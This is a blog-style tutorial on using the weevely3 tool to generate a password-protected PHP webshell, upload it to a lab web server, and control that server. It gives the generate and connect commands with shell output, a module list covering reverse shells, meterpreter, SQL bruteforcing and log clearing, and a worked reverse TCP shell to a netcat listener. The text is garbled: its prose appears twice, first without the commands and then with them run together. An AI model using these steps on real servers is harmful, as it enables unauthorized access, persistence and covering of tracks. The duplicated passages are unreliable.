With weevely terminal we can execute arbitrary code through uploaded php shell on the target web server. It also provide more than 40 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target server.
Some of the main features of weevely are :
- Ssh-like terminal
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Host configuration security auditing
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Run Meterpreter payloads
- Port scan pivoting on target
- Mount the remote filesystem
- Reverse and direct TCP shell
- Bruteforce SQL accounts pivoting on the target
- Meterpreter support
- Service account bruteforce
- Compressed archive management
Installation process of weevely :
weevely3 downlad link : https://github.com/epinna/weevely3/archive/master.zip
In Linux based systems ( Ubuntu/Debian ):
Installing the dependencies :
sudo apt-get install g++ python2.7 python-pip libyaml-dev python-dev libncurses5-dev
Or you can also install dependencies with python pip. First go inside weevely3 directory
Now lets upload the webshell file for futher demonstration, for this i am goping to use Web for Pentester VM. To setup the testlab with Web4Pentester Please visit the below link :
http://www.sec-art.net/2018/03/how-to-install-web-for-pentester-vm-in.html
First we have to upload the webshell on the target server.
Now to connect to the webshell through weevely, use the below command :
http://192.168.56.101/upload/images/shell.php
"password" is password which we gives at the time of webshell creation, which is 12345
Now lets try to connect to the webshell,
and as we can see, we are successfully connected to the target web server via the webshell. It gives the remote shell, through which we can run shell command on the server, for example :
Running the extension Modules :
Currently there are more than 40 modules are available to use in weevely. To use them we just need to type below command on remote shell
To get the full list of available module type :
:file_download - Used to download file from remote server.
:file_upload - Used to upload file to remote server.
:file_read - Used to read files from remote server.
:backdoor_reversetcp - Execute a reverse TCP shell. First start netcat listener on your local machine by :
Now the TCP listener is started on port 9001, then type the below command on weevely terminal :
:net_ifconfig - Get the network interfaces addresses.
Conclusion :
weevely is a very powerful tool to get remote shell on the web servsvers, and in order to exploit file upload vulnerability.
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html
cd weevely3 sudo pip install -r requirements.txt --upgrade ./weevely.py generate <password> <file_name>- password is used to connect back to webshell on the target server.
- file_name is name of the webshell/backdoor file.
./weevely.py generate 12345 shell.phpNow lets upload the webshell file for futher demonstration, for this i am goping to use Web for Pentester VM. To setup the testlab with Web4Pentester Please visit the below link :
http://www.sec-art.net/2018/03/how-to-install-web-for-pentester-vm-in.html
First we have to upload the webshell on the target server.
Now to connect to the webshell through weevely, use the below command :
./weevely <URL> <password>http://192.168.56.101/upload/images/shell.php
"password" is password which we gives at the time of webshell creation, which is 12345
Now lets try to connect to the webshell,
./weevely.py http://192.168.56.101/upload/images/shell.php 12345
and as we can see, we are successfully connected to the target web server via the webshell. It gives the remote shell, through which we can run shell command on the server, for example :
weevely> ls
hacker.jpg
shell.php
www-data@debian:/var/www/upload/images $ uname -a
Linux debian 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
www-data@debian:/var/www/upload/images $ ls
hacker.jpg
shell.php
www-data@debian:/var/www/upload/images $ pwd
/var/www/upload/images
www-data@debian:/var/www/upload/images $Running the extension Modules :
Currently there are more than 40 modules are available to use in weevely. To use them we just need to type below command on remote shell
:<module_name> :system_info
To get the full list of available module type :
:help Module Description
:audit_filesystem | Audit the file system for weak permissions.
:audit_suidsgid | Find files with SUID or SGID flags.
:audit_disablefunctionbypass| Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd | Read /etc/passwd with different techniques.
:audit_phpconf | Audit PHP configuration.
:shell_sh | Execute shell commands.
:shell_su | Execute commands with su.
:shell_php | Execute PHP commands.
:system_extensions | Collect PHP and webserver extension list.
:system_info | Collect system information.
:system_procs | List running processes.
:backdoor_reversetcp | Execute a reverse TCP shell.
:backdoor_tcp | Spawn a shell on a TCP port.
:backdoor_meterpreter | Start a meterpreter session.
:bruteforce_sql | Bruteforce SQL database.
:file_gzip | Compress or expand gzip files.
:file_clearlog | Remove string from a file.
:file_check | Get attributes and permissions of a file.
:file_upload | Upload file to remote filesystem.
:file_webdownload | Download an URL.
:file_tar | Compress or expand tar archives.
:file_download | Download file from remote filesystem.
:file_bzip2 | Compress or expand bzip2 files.
:file_edit | Edit remote file on a local editor.
:file_grep | Print lines matching a pattern in multiple files.
:file_ls | List directory content.
:file_cp | Copy single file.
:file_rm | Remove remote file.
:file_upload2web | Upload file automatically to a web folder and get corresponding URL.
:file_zip | Compress or expand zip files.
:file_touch | Change file timestamp.
:file_find | Find files with given names and attributes.
:file_mount | Mount remote filesystem using HTTPfs.
:file_enum | Check existence and permissions of a list of paths.
:file_read | Read remote file from the remote filesystem.
:file_cd | Change current working directory.
:sql_console | Execute SQL query or run console.
:sql_dump | Multi dbms mysqldump replacement.
:net_mail | Send mail.
:net_phpproxy | Install PHP proxy on the target.
:net_curl | Perform a curl-like HTTP request.
:net_proxy | Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan | TCP Port scan.
:net_ifconfig | Get network interfaces addresses. :<module_name> -h :system_info -h:file_download - Used to download file from remote server.
:file_upload - Used to upload file to remote server.
:file_read - Used to read files from remote server.
:backdoor_reversetcp - Execute a reverse TCP shell. First start netcat listener on your local machine by :
nc -lv 9001
Now the TCP listener is started on port 9001, then type the below command on weevely terminal :
:backdoor_reversetcp 192.168.56.1 9001
:net_ifconfig - Get the network interfaces addresses.
Conclusion :
weevely is a very powerful tool to get remote shell on the web servsvers, and in order to exploit file upload vulnerability.
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html